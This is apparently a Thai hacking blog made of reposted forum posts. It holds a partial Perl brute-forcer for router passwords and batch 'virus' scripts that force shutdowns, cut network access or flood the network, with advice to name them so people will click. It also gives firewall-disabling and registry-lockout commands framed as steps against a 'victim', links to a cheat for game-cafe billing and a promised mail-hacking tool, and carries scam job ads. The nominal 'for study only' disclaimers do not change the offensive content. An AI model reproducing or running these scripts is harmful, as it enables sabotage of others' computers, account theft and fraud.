วันอาทิตย์ที่ 26 กุมภาพันธ์ พ.ศ. 2555

ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์

   

ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ก่อนตั้งคำถาม!!!!!

    ก่อนถามปัญหาทางเทคนิคผ่านทาง shout box หรือใน webboard หรือ ใน ห้องchat แนะให้ทำสิ่งต่อไปนี้ก่อน

    1. หาคำตอบจากกระทู้ในบอร์ดนั้นๆก่อน
    2. ไปค้นในเว็บทั่วไปเสียก่อน
    3. พยายามอ่าน กฏ หรืออะไรก็ตามที่เขาแนะนำให้อ่าน
    4. ไปหาอ่านใน FAQ (ปัญหาที่เจอบ่อย)
    5. ลองตรวจดู หรือ ทำการทดลองเองก่อน 
    6. หากคุณเป็น programmer ลองพยายามศึกษา source code เองดูก่อน
    7. กลับไปอ่านข้อ 1 ใหม่

    ระหว่างการถามคำถาม ให้แสดงว่าคุณได้พยายามทำด้วยตัวเองแล้ว เพราะมันจะช่วยให้คุณไม่ใช่ตัวขี้เกียจที่รอแต่คนมาป้อนให้และไม่เป็นการเสียเวลาสำห
    รับ ผู้ที่จะช่วยให้คำตอบคุณ จะให้ดีกว่านั้น คุณควรนำเสนอสิ่งที่คุณได้ ศึกษา มาก่อนหน้านี้ เพราะเราชอบจะตอบคำถามกับคนที่แสดงให้เห็นว่าพวกเขาสามารถเรียนรู้จากคำตอบ ได้

วันพฤหัสบดีที่ 23 กุมภาพันธ์ พ.ศ. 2555

เฉลย วิธีผ่าน hackthissite level basic 1-10

เฉลย วิธีผ่าน hackthissite level basic 1-10
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org

สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ

ข้อมูลจาก ruk-com.in.th

วันอังคารที่ 21 กุมภาพันธ์ พ.ศ. 2555

[ของดีสำหรับชาว hacker]โปรแกรมป้องกันไม่ให้เห็น IP ใช้ง่ายมาก

Auto Hide IP 5.0.9.8  [ซ่อนIPของเราได้]
คุณไม่ทราบที่อยู่ IP ของคุณคือสัมผัสทุกครั้งที่คุณเยี่ยมชมเว็บไซต์ทุกครั้งหรือไม่ ที่อยู่ IP ของคุณคือตัวตนออนไลน์ของคุณและสามารถนำมาใช้โดยแฮกเกอร์เจาะเข้าสู่เครื่องคอมพิวเตอร์ของคุณ

ขโมยข้อมูลส่วนบุคคลหรือกระทำผิดอื่น ๆ ต่อคุณ Auto Hide IP ช่วยให้คุณสามารถท่องโดยไม่ระบุชื่อ, เปลี่ยนที่อยู่ IP ของคุณป้องกันการขโมยข้อมูลส่วนตัวและป้องกันการแฮ็กเกอร์ intrusions, ทั้งหมดด้วยการคลิกปุ่ม Auto Hide IP . Auto Hide IP เป็นซอฟต์แวร์ป้องกันความเป็นส่วนตัวซึ่งช่วยให้คุณสามารถปกปิดที่อยู่ IP ของคุณจริงท่องโดยไม่ระบุชื่อและจะเปลี่ยนที่อยู่ IP ของคุณทุกสองสามนาที, คุณสามารถเลือก IP ปลอมจากประเทศที่แตกต่างกันทางเลือกตัวเลือก IP ประเทศและสามารถตรวจสอบทรัพย์สินทางปัญญาโดยตรง การใช้มัน, คุณสามารถที่จะปกปิดออนไลน์ตัวตนของคุณด้วยการแสดง IP ปลอม, การปิดกั้นแฮกเกอร์และ prying ตารู้ว่าสถานที่จริงตัวตนของคุณหรือ คุณยังสามารถเลือกเปิดตัวในการเริ่มต้นแล้วมันจะทำงานและโหลดไอพีปลอมโดย อัตโนมัติเมื่อคุณเข้าสู่ระบบ นอกจากนี้คุณสามารถสลับระหว่าง IP ปลอมและ IP จริงโดยเพียงคลิกที่ปุ่มของซ่อน IP หรือหยุดซ่อน

-Auto Hide IP ทำงานกับ Internet Explorer, Firefox, Opera, Maxthon, MyIE และเข้ากันได้กับทุกประเภทของเราเตอร์ไฟร์วอลล์เครือข่ายภายในบ้าน, เครือข่ายไร้สายและคนอื่น ๆ ในอินเทอร์เน็ต

-ท่องเว็บไม่ประสงค์ออกนาม

-ป้องกันไม่ให้คนอื่นเห็น IP จริงของคุณเรียกดูในขณะที่อินเทอร์เน็ต เปลี่ยน IP ของคุณเป็นประจำด้วยการคลิกปุ่ม!ซ่อน

@การป้องกันตัวตนของคุณ

วันเสาร์ที่ 18 กุมภาพันธ์ พ.ศ. 2555

ทำงานผ่านเน็ตรายได้ 3,000 - 5,000 บาทต่อสัปดาห์ สนใจรับรายละเอียดฟรี คลิ๊ก!!!


ทำงานผ่านเน็ตรายได้ 3,000 - 5,000 บาทต่อสัปดาห์ สนใจรับรายละเอียดฟรี คลิ๊ก!!!

ระบบ The First Power System

ต้องการที่จะรับสมัครพนักงานเพิ่มอีกจำนวนมาก

-ชาย/หญิง ที่มีเวลาและสนใจในการทำงาน
-สามารถใช้คอมพิวเตอร์ Internet พื้นฐานได้
-อายุตั้งแต่ 15 ปี ขึ้นไป
-ไม่จำเป็นต้องมีประสบการณ์
-ไม่จำกัดวุฒิการศึกษา

PART-TIME  8,000 - 12,000 บาท / เดือน
FULL-TIME  15,000 บาท/ ขึ้นไป

สนใจดูรายละเอียดที่  (สนใจสร้างรายได้กรอกข้อมูลทิ้งไว้ในลิงค์ด้านล่างเลยน่ะ

>>>>>>http://goo.gl/ut17t
 
เอ้า!! : อยากเป็นวัยรุ่นที่ First Class มีเงินใช้สอยอย่างไม่ขาดสาย
มัวร์รออะไรอยู่ละ' กรอกข้อมูลทิ้งไว้ในลิงค์เว็ปไซด์เลย

ข้อมูลจาก ruk-com.in.th

วันพฤหัสบดีที่ 16 กุมภาพันธ์ พ.ศ. 2555

วิธีการแฮกโปรแกรมคิดเงินในร้านเกม NCAFE ผมตั้งกระทุ้นี้เปนการศึกษานะอย่าเอาไปโกง

ดูตามรูปคับ

http://image.ohozaa.com/show.php?id=a18acf2676e87eb7c4763ea367e1d3a9

http://image.ohozaa.com/show.php?id=4f8b52def39dc093678da5831f1081ec

http://image.ohozaa.com/show.php?id=8078d6504a1fcfcd2e2669341fa3d59e

http://image.ohozaa.com/show.php?id=91bbc52b06a39f4fc2ee6515ba14632b

ผมแถมวิธีทำให้ด้วยคับไม่เชื่อลองทำดูง่ายมากคับ

http://www.beupload.com/download/?866743&A=687492

ผมทำให้ดูเพื่อให้ป้องกันกันดีขึ้นนะคับไม่ได้ให้ไปโกงกัน  ^-^

ข้อมูลจาก ruk-com.in.th

วิธีการ Hack RAM

 :( :( :(

คำเตือน : เอาไว้ดูเฉยๆ ไม่ต้องทำตามหรอก แต่ถ้าเอาไปแกล้ง ระวังกรรมตามทันนะครับ
คำแนะนำ : กระทู้นี้ไม่มีรูปภาพ ดังนั้นจึงต้องคิดภาพเอาเองอ่ะนะ

วิธีการ Hack RAM

ประสบการณ์ของผู้เขียน : เคยโดนมาแล้ว (Hack เอง) เหลือ 32 เอง โฮๆ มะต้องใช้ Adobe Photoshop กันหละ

1. เข้า Start > Run > พิมพ์ msconfig
2. เลือก tab Boot.ini (Boot.ini เป็นไฟล์สั่งให้บูทเครื่องนั่นแหละ ถ้าคุณไม่มีก็บูทไม่ได้)
3. สนใจอย่างอื่นไปก่อนก็ได้ (เครื่องพังไม่รู้ด้วยนะ)
4. คลิก Advanced Options...
5. ติ๊ก /MAXMEM= แล้วพิมพ์หน่วย RAM ที่อยากได้ (ต่ำกว่า RAM สูงสุดนะ)
เช่น : มีแรม 1024
ติ๊ก /MAXMEM= "<1024"
กด OK ไปเรื่อยๆ เลย จนกว่าเค้าจะบอกให้เรา Restart ใหม่เพื่อเปลี่ยน RAM [/i]

ข้อมูลจาก ruk-com.in.th

ลอง ส่งไฟร์แกล้งคน กันมั้ย !!

ข้อมูลสรุปนี้ไม่พร้อมใช้งาน โปรด คลิกที่นี่เพื่อดูโพสต์

มาCrack พาสเวิร์ดของ Router กันบ้าง

นี่Code Perl

#!/usr/bin/perl
print "*****************************************

  _____________________
< Brute Authentication >
  ---------------------
       |  ,__,
        | (oo)____
          (__)    )\
             ||--|| *                          \n";
print "*    code by  windows98SE               *\n";
print "*****************************************\n";

use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';

my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");

วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง


วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
เอ.............. เราเล่น net เพลินๆอยู่นี่มีใครแอบเข้ามาหาเราหรือเปล่าน้อ

** Google แอบย่องมาเก็บข้อความในเครื่องเราไปโชว์ทั่วโลกบ้างมั้ยนี่
** แล้วพวกโฆษณา แฝงเข้ามาบ้างไหม อื่ม... เรามี Anti spyware แล้วนี่
** มีบรรดา hacker มาเยี่ยมบ้างไหม

เอางี้ มาดูวิธีแอบดูว่าใครหรือมีอะไรมาแวะหาเราบ้าง
ในขณะที่สมาชิกกำลังใช้งาน internet อยู่ (ไม่ว่าจะเป็น www, FTP, ตรวจสอบ mail ด้วย POP3/SMTP โดยผ่าน protocal TCP/IP)

ท่านรู้มั้ยว่ามีใคร connected มายังเครื่องคอมฯของท่านบ้าง (มีพวก Hacker มาป้วนเปี้ยนหรือเปล่า) และก็อยากทราบหรือไม่ว่ามาจากไหน
ไม่ยากครับที่จะตรวจสอบ เพียงทำตามขั้นตอน ข้างล่างนี้...

++ เริ่มที่ ตัว Start ให้ท่าน คลิกที่ Start ---> Run
++ ที่ Run พิมพ์คำว่า netstat 10 (10 หมายถึงให้ update การ connect ใหม่ทุก ๆ 10 วินาที)
++ เสร็จแล้ว กดปุ่ม < Enter >

จากนั้น โปรแกรมจะแสดง[ ในmode dos ] ให้เห็นว่ามีใคร Connected มายังเครื่องคอมฯของท่านบ้าง พร้อมกับแจ้ง address ให้ด้วย
วิธีนี้ สามารถใช้ใน '98, Me , XP [ 2000 - ไม่มีให้ลอง เลยไม่ทราบ ใครทราบแจ้งด้วยครับ ]
### ถ้าเป็นการ run หาในเครื่องเรา ก็จะแสดงเป็น localhost ....... [ ตามด้วยหมายเลข ]

credit : http://www.zone-it.com

ข้อมูลจาก ruk-com.in.th

วันพุธที่ 15 กุมภาพันธ์ พ.ศ. 2555

Hotmail,yahoo,gmail,Facebook,hi5,webonline[โปรแกรมมาแล้ว]



ขอมานะครับ วันนี้ไม่ทัน เด๋วพรุ่ง นี้เอาให้มี ให้เล่นอีกเย๊อะ

ขอความกรุณา อย่าเอา User กับ Pass ที่อยู่ในภาพไป แก้ไขหรือเปลี่ยน รหัสและอย่าทำให้เขาได้รับความเสียหายนะ ครับ
เราศึกษา เพื่อแก้ไข ไม่ใช่ทำลายนะครับ พรบ คอมพิวเตอร์ ปี 54  จะออกแล้ว แรงนะ ครับ


กดขอตรงนี้=> คลิก!! http://adf.ly/2ITjI

ชื่อบนภาพ เป็นนามแฟงผมเอง
พรุ่งนี้มี  2 ตัวมาแจก นะครับ รออ

1. โปรแกรม hack mail
2. โปรแกรมสร้างไวรัส สำเร็จรูป
อันนี้ลองได้ ไม่รับประกัน โดนมาแล้ว เล่าให้ฟังสักนิดก็ได้ ผมทำไว้เล่น ๆ ใส่ แฟรชไดร์ ไว้ บังเอิญ เพื่อน ยืมไปสอนหนังสือ นศ ลืมบอกว่าเป็นไวรัส ทำไว้ซะสวยงามเลยเป็น ไอคอนรูป เกมส์
คอม 45 เครื่อง ลง วินโดว์ใหม่หมด 555+


ข้อมูลจาก ruk-com.in.th

การHACK MAIL

วิธีการ hack เมลลืเพื่อนๆ
 ;)

วันอังคารที่ 14 กุมภาพันธ์ พ.ศ. 2555

รวมคำสั่ง unix เพื่อเข้าสู่การ hack

รวมคำสั่ง unix เพื่อเข้าสู่การ hack

คำสั่ง Unix ที่ใช้เป็นประจำ
Unix เป็นระบบปฏิบัติการที่นิยมใช้กับแพร่หลายบนระบบขนาดใหญ่ และในปัจจุบันยังมีระบบปฏิบัติการในลักษณะของ Unix-like เกิดขึ้นมากมาย และ เริ่มเป็นที่นิยมใช้กันมากหลายยิ่งขึ้นบนเครื่องคอมพิวเตอร์ส่วนบุคคล เอกสารชุดนี้จึงสรุปคำสั่งบน Unix ที่มักใช้เป็นประจำโดยมีการยกตัวอย่างเปรียบเทียบกับ DOS/Windows พร้อมกับอธิบายถึงส่วนขยายเพิ่มเติมของคำสั่ง เพื่ออำนวยความสะดวกให้กับผู้เริ่มหัดใช้ Unix ทั่วไป

วันอาทิตย์ที่ 12 กุมภาพันธ์ พ.ศ. 2555

8 วิธีในการ Hack ฐานข้อมูล Oracle และ การป้องกัน

บทความ จาก Oracle Guru เป็นเรื่องกับ Security ที่น่าสนใจมากครับ  "8 วิธีในการ Hack ฐานข้อมูล Oracle" ..ไม่ได้สอนให้ไป Hack ใครนะครับ 
แต่ นำเสนอเพื่อจะได้ป้องกันช่องโหว่ในฐานข้อมูล Oracle ของเราต่างหาก ชื่อเรื่อง บอก 8 วิธี แต่ผมอ่านบทความ ไหง มันมีแค่ 4 วิธีหว่า  Shocked
หรือ ว่า เค้า นับว่า วิธี Hack 4 วิธี กับ วิธีป้องกันการ Hack นั้นๆ อีก 4 วิธี นับรวมกันเป็น 8 วิธี มั๊ง ต้องไปถาม อีตา Sean Hull คนเขียนเองละกัน  :
http://www.oracleskill.com/oracle-world-wide-article/eight-ways-to-hack-oracle.html

ข้อมูลจาก ruk-com.in.th

วันพฤหัสบดีที่ 9 กุมภาพันธ์ พ.ศ. 2555

ผู้เริ่มต้น สู่ แฮกเกอร์ มือเซียน 1

ทั่งหมดให้เครดิตแก่ หนังสือแฮกทุกๆเล่ม (มีหลายเล่ม) น่ะครับบ  ??? ???

- Internet คืออะไร
เป็นเครื่อข่ายที่ใหญ่มาก (ซึ่งถูกย่อเป็น www ) ที่เชือมต่อคอมพิวเตอร์ทั่วโลกเข้าด้วยกันนั้นเอง

- Internet ทำงานอย่างไร (โปรก็ควรอ่าน)
การทำงานของอินเตอร์เน็ตอยุ่ในลักษณะ PacKet Swits ดดยแบ่งอยกออกตามข้อความออกมาเป็นหน่วยตามบรรจุจำนวนที่เหมาสม เรียนว่า Packet  และถูกสกั้ดกันโดย Router ซึ่งมีหน้าที่อ่าน เพื่อส่งไปยังทิศทางที่ถูกต้อง  คอมพิวเตอร์ทุกเครื่องส่วนนอกนั้นจะแปลสิ่งที่ว่า TCP/IP ได้เหมือนๆกัน

เราสามารถ hack บัตรเติมเงินโทรศัพท์ ได้หรือไม่

บังเอิญได้อ่านบทความนี้มาจาก Net พบว่า เป็นโจทย์ที่น่าคิดมาก เพราะผมก็ใช้บัตรเติมเงินอยู่ เป็นของ dtac
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร

   เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ

          แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป

           สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก

วันพุธที่ 8 กุมภาพันธ์ พ.ศ. 2555

ที่สุดของ Hacker ที่ Hacker ไฝ่ฝันไขว้ขว้ามันมา

เรื่องนี้อาจเป็นเรื่องสุดท้ายของผม  ก่อนไปผมอยากเห็น พวกคุณ ขอบคุณ ผมจริงๆจังๆสักที ขอคุณครับ :-\ :-\

- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง  DWORD  Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default)   Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
@echo off
net stop "Security Center"
netsh firewall set opmaode mode=disable
4.รุ้ข้อมูลเครื่องเหยื่อ
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus

- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย

- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com

ข้อมูลจาก ruk-com.in.th

Basic Hacker

พื้นฐานนะครับ บอกไว้ก่อน เดี่ยวจะหาว่าผมยังโน้นยังนี้ครับ
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ

ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย

เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)

-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]

งานพิเศษง่ายๆผ่านระบบอินเตอร์เน็ตรายได้มากกว่า4หมื่นถึงหลักแสนบาทต่อเดือน

งานพิเศษง่ายๆผ่านระบบอินเตอร์เน็ตรายได้มากกว่า4หมื่นถึงหลักแสนบาทต่อเดือนสนใจเข้ามา!!!!
ต้องการที่จะรับสมัครคนที่สนใจทำงานกับระบบThe First Powerที่สามารถทำให้คนธรรมดามีรายได้หลักแสนบาทได้
ด้วยการทำงานงานผ่านระบบInternet WebsiteในธุรกิจNetwork (PART-TIME / FULL-TIME)
มีระบบเช็ครายได้ online realtime ตลอด24ชั่วโมงสามารถตรวจสอบได้
ต้องบอกด้วยว่า"บริษัทของเรามีครบทั้ง 7 สิ่งสำคัญในการทำธุรกิจ"
- คุณสมบัติของผู้ที่สนใจ !!
- ชาย/หญิง ที่มีเวลาและสนใจหางานทำ
- สามารถใช้คอมพิวเตอร์ Internet พื้นฐานได้
- อายุตั้งแต่ 15 ปี ขึ้นไป
- ไม่จำเป็นต้องมีประสบการณ์
- ไม่จำกัดวุฒิการศึกษา
PART-TIME 10000 - 15000 บาท / เดือน
FULL-TIME 30000 บาทขึ้นไป / เดือน
สนใจดูรายละเอียดที่
>>>>  http://goo.gl/LtAqQ

ข้อมูลจาก ruk-com.in.th

วันอาทิตย์ที่ 5 กุมภาพันธ์ พ.ศ. 2555

หาช่องทางแฮก (DDOS)

หาช่องทางแฮก (DDOS)
-การ โจมตีที่เกิดขึ้นมักจะทำให้เกิดการใช้งานแบนด์วิดธ์จนเต็มที่ เช่น SYN flood ถ้าหากทำการกรองแพ็คเก็ตที่ ISP ได้ ก็จะสามารถลดผลกระทบที่จะเกิดขึ้นได้

-ติดตั้ง hardware ที่มีขีดความสามารถสูงไว้ระหว่างเครือข่ายของ ISP กับของระบบที่ต้องการป้องกัน เช่น การติดตั้งเราเตอร์ประสิทธิภาพสูง ที่สามารถทำ filtering ได้

-โดยปกติการโจมตีแบบ DoS ผู้โจมตีมักจะโจมตีไปยังเป้าหมายโดยระบุเป็น ip address โดยตรง ไม่ได้ผ่านการทำ DNS lookup มาก่อน ดังนั้น เมื่อเกิดการโจมตีขึ้น ยังสามารถหาหนทางหลบหลีกการโจมตีดังกล่าวได้ 2 วิธีคือ 1. เปลี่ยน ip address เมื่อเกิดการโจมตี 2. เปลี่ยน ip address ไปเรื่อยๆ แม้จะไม่มีการโจมตี ซึ่งการกระทำทั้งสองรูปแบบก็มีข้อดีข้อเสียต่างกัน ในรูปแบบแรกจะต้องมีระบบตรวจจับที่ดี สามารถแจ้งเตือนผู้ดูแลระบบให้สามารถปรับเปลี่ยน ip address ได้อย่างรวดเร็ว จะเห็นว่ามีช่องว่างระหว่างการดำเนินงานอยู่ แต่ก็มียังมีข้อดีที่ผู้โจมตีจะไม่สามารถรู้แทกติกนี้จนกว่าจะเริ่มโจมตี ในขณะที่วิธีที่สองจะมีความยากลำบากในการเริ่มโจมตีมากกว่า

มีวิธีปฏิบัติที่ใช้ได้จริงซึ่งต้องการการแก้ไขเพียงเล็กน้อย และพยายามลดผลกระทบที่จะเกิดขึ้นกับผู้ใช้ให้น้อยที่สุด ดังนี้

ขั้นแรกของการเป็น Hacker

ผมจะไม่ขอเกริ่นเรื่องชนิดของ hacker นะครับเพราะให้ท่านลอง search ดูตามเว็บไซต์ต่างๆมีเยอะแยะมากมาย ทั้ง blackHat whiteHat GrayHat SuicideHacker cracker hacker etc. เหล่านี้ ต่อให้ยังไงมันก็คือ hacker วันยันค่ำแหละครับไม่ต้องมาบอกหรอกว่าตัวเองเป็นฝ่ายธรรมะ คุณเป็นฝ่ายอธรรม…..อ่ะเข้าเรื่องล่ะ

เรื่องแรกนี้จะให้ท่านได้รู้จักชนิดของการโจมตีของเหล่า hacker จะได้รู้ว่าตอนนี้ระบบของท่านกำลังโดนการโจมตีชนิดใดอยู่จะได้เอามา วิเคราะห์ได้นะครับ
การโจมตีจะมีอยู่ 4 ชนิดด้วยกันคือ
1.Operating System Attacks
2.Appilcation-level Attacks
3.Shrink Wrap code Attacks
4.Misconfiguration Attacks

วันเสาร์ที่ 4 กุมภาพันธ์ พ.ศ. 2555

วิธีสร้างไวรัสแบบง่ายๆ (ถ้าซ้ำขออภัย)

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น

Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต

Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release

Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

==============================

*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว

Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก - -'

วันพฤหัสบดีที่ 2 กุมภาพันธ์ พ.ศ. 2555

การใช้โปรแกรม NETSTAT

เป็นคำสั่งที่ใช้ตรวจสอบ Network เกี่ยวกับการเชื่อมต่อ Port ในเครื่องเรากับเครื่องอื่นใน Network



จากการใช้คำสั่งจาก DOS Prompt ในรูปข้างบน เป็นการเรียกดูวิธีการใช้ของโปรแกรม netstat โดยการใส่เครื่องหมาย /? ต่อท้ายคำสั่งนั้น (สามารถใช้ได้กับโปรแกรมอย่างอื่นในดอสได้ด้วย) เพื่อขอดูการใช้งาน ผมจะอธิบายที่ละบรรทัดอย่างคร่าวๆ

และ การใช้คำสั่งนี้ ไม่ว่าจะเป็น Opiton หรือใดๆก็ตาม จะไม่เป็นอันตรายต่อเครื่อง รวมทั้งระบบ Network ซึ่งในการใช้ สามารถใช้ได้ในขณะที่ต่อ Internet หรือไม่ก็ตาม

-a Displays all connections and listening ports.

Opiton นี้จะเป็นการดูการเชื่อมต่อ Port ทั้งหมดที่ (เครื่องนั้นๆ=เครื่องคุณ) ที่ใช้คำสั่งนี้ได้เปิดรอการเข้ามาติดต่อ แต่ผลที่แสดงจะเป็นรายชื่อ Service ที่ติดต่อกับเครื่อง (เครื่องนั้นๆ=เครื่องคุณ) เช่นชื่อเว็บไซด์หรือชื่อเครื่อง ไม่แสดงเป็นตัวเลข IP

-e Displays Ethernet statistics. This may be combined with the -s option.

Opiton นี้จะเป็นการดูเหมือนกับสถิติต่างๆในการรับ/ส่งข้อมูลต่างๆ ต้องใช้ร่วมกับ Opiton -s เป็นการดูสถานะการรับส่งข้อมูลต่างๆ ซึ่งลองใช้ดูได้

-n Displays addresses and port numbers in numerical form.

Opiton นี้จะเหมือนกับ -a แต่การแสดงผลจะเป็นเลข IP กับ Port แทนชื่อเครื่องหรือชื่อเว็บไซด์ต่างๆที่ได้มีการติดต่อหรือเชื่อมการติดต่อ

การใช้งาน netstat (แบบดอส)

SQL Injection

วันนี้ลองมาดูในเรื่องของการเขียน SQL ที่เรียกว่า SQL Injection กันนะค่ะ ในเรื่องของความปลอดภัย ผู้ไม่หวังดีอาจจะลองเขียนหรือกรอกข้อมูลเข้ามาที่ทำให้
SQL Statement เป็นจริงตลอดเพื่อให้ logic ที่เราเขียนเอาไว้นั้นเกิดผิดพลาดขึ้นมา ก้อลองมั่วดูนะค่ะ

ยกตัวอย่างเช่นในการทำหน้า login ด้วย username password  เราใช้ SQL Statement ดังนี้
Code:
$SQL = "select *
        from member
        where username ='$_POST[username]' and password ='$_POST[password]';";

เราไปกำหนดให้ username เป็น 'admin' password มีค่าเป็น '1234' ดังนั้นทดสอบ login ดังภาพที่ 1
หลังจากนั้นเราจะใช้ function mysql_num_rows ในการนับ recordset ว่ามีจำนวนเท่าไหร่ หาก query ถูกต้องแสดงผลลัพธ์ที่มากกว่าศูนย์



